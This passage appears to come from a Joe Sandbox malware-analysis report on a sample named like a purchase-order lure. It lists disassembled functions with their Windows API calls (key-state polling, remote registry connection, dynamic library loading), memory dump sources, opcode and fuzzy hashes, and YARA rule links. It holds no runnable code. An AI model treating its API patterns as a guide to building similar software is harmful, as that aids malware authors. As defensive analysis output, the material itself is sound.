                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                        • __freefls@4.LIBCMT ref: 00415209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 442100245-0
                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                        Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 621800784-4108050209
                                                        • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                        • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                        Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                        • String ID: \VH
                                                        • API String ID: 3884216118-234962358
                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                        Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                        • IsMenu.USER32(?), ref: 0044854D
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert
                                                        • String ID: 0
                                                        • API String ID: 3076010158-4108050209
                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                        Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1589278365-1403004172
                                                        • Opcode ID: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                        • Opcode Fuzzy Hash: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                        Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Handle
                                                        • String ID: nul
                                                        • API String ID: 2519475695-2873401336
                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                        Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Handle
                                                        • String ID: nul
                                                        • API String ID: 2519475695-2873401336
                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                        Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SysAnimate32
                                                        • API String ID: 0-1011021900
                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                        Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                        • GetFocus.USER32 ref: 0046157B
                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                        • __swprintf.LIBCMT ref: 00461608
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 2645982514-1110647743
                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                        Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                        Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 3488606520-0
                                                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                        Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 15295421-0
                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                        Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$Library$FreeLoad
                                                        • String ID:
                                                        • API String ID: 2449869053-0
                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                        Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                        • String ID:
                                                        • API String ID: 3539004672-0
                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                        Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
